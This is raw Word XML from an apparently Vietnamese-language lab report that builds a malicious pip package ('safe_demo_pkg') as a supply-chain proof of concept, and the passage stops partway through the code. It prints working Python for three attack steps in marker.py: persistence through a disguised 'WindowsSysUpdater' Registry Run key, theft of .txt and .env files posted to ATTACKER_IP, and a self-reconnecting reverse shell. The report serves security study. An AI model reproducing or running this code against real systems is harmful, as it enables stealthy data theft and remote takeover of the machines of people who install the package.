      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="18" w:after="18"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>├── welcome.html          #</w:t>
      </w:r>
      <w:r w:rsidR="002D1355">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Giao diện pypiserver tùy chỉnh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D808C2" w14:textId="2B581FFD" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="18" w:after="18"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>├── setup.py              # Module-level trigger, ver 1.</w:t>
      </w:r>
      <w:r w:rsidR="002D1355">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D4F761" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="18" w:after="18"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>├── README.md</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12233C94" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="18" w:after="18"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>├── dist/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD7A273" w14:textId="619DC230" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="18" w:after="18"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>│   └── safe-demo-pkg-1.</w:t>
      </w:r>
      <w:r w:rsidR="008D3A5B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.tar.gz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278007D2" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="18" w:after="18"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>└── safe_demo_pkg/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B8C87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 __init__.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CEEB05B" w14:textId="37257668" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="18" w:after="18"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    └── marker.py         # Persistence + True Exfil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF05F1C" w14:textId="4B224F36" w:rsidR="004D4D10" w:rsidRDefault="002D1355">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="7E45A9B3" wp14:editId="5A41AFB9">
            <wp:extent cx="5960110" cy="1277438"/>
            <wp:effectExtent l="0" t="0" r="254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960110" cy="1277438"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7D9D06" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc227470567"/>
      <w:r>
        <w:t>A.3 — Xây dựng logic mô phỏng hành vi (marker.py)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="20FDBFBB" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>File marker.py là nhân cốt lõi của PoC. Phiên bản cập nhật bổ sung hai hành vi mới so với phiên bản đầu: persistence qua Registry và true exfiltration gửi dữ liệu thực sự qua mạng về C2 — không còn chỉ là local file copy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B12686" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="004D4D10">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="441FC85C" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>Hàm 1: persist_registry() — Persistence (T1547.001)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1256378F" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>Hàm này thêm một Registry key vào HKCU\Software\Microsoft\Windows\CurrentVersion\Run để đảm bảo payload tự khởi động lại sau khi máy victim reboot. Đây là kỹ thuật persistence phổ biến nhất trên Windows — MITRE ATT&amp;CK T1547.001.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109E1D07" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="004D4D10">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CCC523D" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tại sao dùng HKCU thay vì HKLM?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657BA694" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>HKCU (HKEY_CURRENT_USER) không cần quyền Administrator — payload ghi được mà không cần leo thang đặc quyền</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B2735A" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Ít bị giám sát hơn HKLM — nhiều EDR tool tập trung vào HKLM\...\Run hơn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000019A4" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Hoạt động ngầm, tên key được đặt là 'WindowsSysUpdater' để lẫn vào các entry hợp pháp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE4692B" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="004D4D10">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57385210" w14:textId="73A285FF"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def persist_registry():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B1181D"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"""T1547.001 - Thêm Registry Key để tồn tại sau khi reboot"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F6E461"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try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A440E6"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import winreg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5A5B26"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key = winreg.OpenKey(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21677EFF"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winreg.HKEY_CURRENT_USER,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7FCD56"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r"Software\Microsoft\Windows\CurrentVersion\Run",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F527C5"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0, winreg.KEY_SET_VALUE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F038E00"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266B833F" w14:textId="621C02D9"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 Gọi đích danh package và hàm run_marker thay vì pass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0596DB49"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payload_cmd = f'"{sys.executable}" -c "from safe_demo_pkg.marker import run_marker; run_marker()"'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0767395E"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E108751"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winreg.SetValueEx(key, "WindowsSysUpdater", 0, winreg.REG_SZ, payload_cmd)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2402CB"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winreg.CloseKey(key)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8C13D1" w14:textId="77777777" w:rsidR="00D2523D" w:rsidRPr="00D2523D" w:rsidRDefault="00D2523D" w:rsidP="00D2523D">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="18" w:after="18"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D2523D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    except Exception:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="291610FE" w14:textId="2BE10C53" w:rsidR="004D4D10" w:rsidRDefault="00D2523D" w:rsidP="00D2523D">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="18" w:after="18"/>
      </w:pPr>
      <w:r w:rsidRPr="00D2523D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        pass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E96A68E" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>Hàm 2: true_exfiltrate() — True Data Exfiltration (T1041)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04807DF7" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>Đây là hàm được cập nhật lại so với phiên bản đầu. Thay vì chỉ copy file sang C:\Temp\Loot (local staging — T1074), hàm này đọc nội dung file và gửi thực sự qua mạng về C2 server trên Ubuntu qua HTTP POST. Đây là True Exfiltration theo đúng định nghĩa MITRE T1041.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506D212E" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="004D4D10">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="059EC140" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="100"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Phân biệt Local Staging vs True Exfiltration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67798536" w14:textId="77777777" w:rsidR="00246FB1" w:rsidRDefault="00246FB1">
      <w:pPr>
        <w:spacing w:before="8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00"/>
      </w:tblGrid>
      <w:tr w:rsidR="004D4D10" w14:paraId="20ABDCC4" w14:textId="77777777">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36685811" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Hành vi</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5C075745" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Định nghĩa &amp; MITRE TTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004D4D10" w14:paraId="071FF4E8"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C4117DA" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Local Staging (v1.0 cũ)</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3CFF6D" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Copy file sang C:\Temp\Loot — vẫn nằm trên máy victim. MITRE T1074. Attacker phải dùng shell để đọc thủ công.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004D4D10" w14:paraId="75A3F522"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700328DE" w14:textId="1E48D68A" w:rsidR="004D4D10" w:rsidRPr="002D1355" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1355">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>True Exfiltration (v1.</w:t>
            </w:r>
            <w:r w:rsidR="002D1355" w:rsidRPr="002D1355">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidRPr="002D1355">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> mới)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="48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4443BC84" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRPr="002D1355" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1355">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Đọc nội dung file, gửi qua HTTP POST về attacker. MITRE T1041. Dữ liệu rời khỏi máy victim tự động, không cần thêm thao tác.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2E0009BF" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="004D4D10">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5282A98B" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="18" w:after="18"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>def true_exfiltrate():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79AF2C6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"""T1041 - Gửi data thực sự qua mạng về C2"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50489097"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user_path = os.path.expanduser('~')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ADFCAD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target_dir = os.path.join(user_path, 'Documents')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4675A01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loot = ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298AF06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try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5235E17B"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for root, dirs, files in os.walk(target_dir):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="781816C1"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for file in files:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2DD99B"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file.endswith((".txt", ".env", "config.txt")):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D01F3F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filepath = os.path.join(root, file)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF815DB"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try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6B39F7"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with open(filepath, 'r', encoding='utf-8') as f:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029B968B"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loot += f"\n--- {file} ---\n{f.read()}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25EB15D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except: pass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B257B7"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loot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42DBDA3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data = urllib.parse.urlencode({'data': loot}).encode('utf-8')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="074EC4C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req = urllib.request.Request(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73DEB4A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f'http://{ATTACKER_IP}:{EXFIL_PORT}/exfil', data=data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C4EEF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3B0F54A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urllib.request.urlopen(req, timeout=5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="562FD1A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except Exception:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="038BC47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pass  # Đã sửa lỗi double-except lồng nhau của phiên bản cũ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23FD1BA4" w14:textId="0CA18D23"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556A440A" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF3CD"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="401A3992" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
              </w:rPr>
              <w:t>Lỗi cú pháp đã sửa — Double except</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="491F6B75" w14:textId="422EF9BC" w:rsidR="004D4D10" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:t>Phiên bản cũ có lỗi SyntaxError: hai except (except Exception as e: và except: pass) cho cùng một try — Python không cho phép cấu trúc này. Phiên bản 1.</w:t>
            </w:r>
            <w:r w:rsidR="00031A18">
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> đã hợp nhất thành một khối try/except duy nhất, loại bỏ hoàn toàn bare except thừa.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="68C119FC" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="004D4D10">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="530EB708" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>Hàm 3: reverse_shell() — Backdoor C2 (T1059.001)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7690899E" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>Hàm này duy trì kênh điều khiển từ xa. Thay vì attacker kết nối vào máy victim (sẽ bị firewall chặn inbound), máy victim chủ động kết nối ra ngoài về attacker — outbound connection ít bị chặn hơn và khó phát hiện hơn trong log firewall.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21FC58D4" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="004D4D10">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68E87C2E" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Các kỹ thuật đáng chú ý:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F0CF45" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Vòng lặp while True — tự động reconnect sau 10 giây nếu kết nối bị ngắt: đặc điểm của persistent backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664C6CBF" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>subprocess.Popen(shell=True) — thực thi lệnh qua cmd.exe và trả kết quả về attacker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF4BDB2" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>threading.Thread(daemon=False) — shell chạy trên luồng riêng, không phụ thuộc pip cha, tồn tại sau khi cài xong</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="741E1520" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="004D4D10">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="411D670F" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="18" w:after="18"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>def reverse_shell():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20077CC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while True:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4B697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try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1AAFE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 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CDB4CC6" w14:textId="77777777" w:rsidR="004D4D10" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="18" w:after="18"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            s.connect((ATTACKER_IP, SHELL_PORT))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541CF436"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s.send(b"\n[+] S04 Advanced Shell Connected!\n")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D1A2DE"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while True:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0662040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s.send(b"Shell&gt; ")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7941513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data = s.recv(1024).decode("utf-8").strip()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D6830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data.lower() in ["exit", "quit"]: return</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="156E672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proc = subprocess.Popen(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477856C7"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data, shell=True,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA5E3B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stdout=subprocess.PIPE, stderr=subprocess.PIPE,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1CB725"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stdin=subprocess.PIPE</w:t>
      </w:r>
    </w:p>
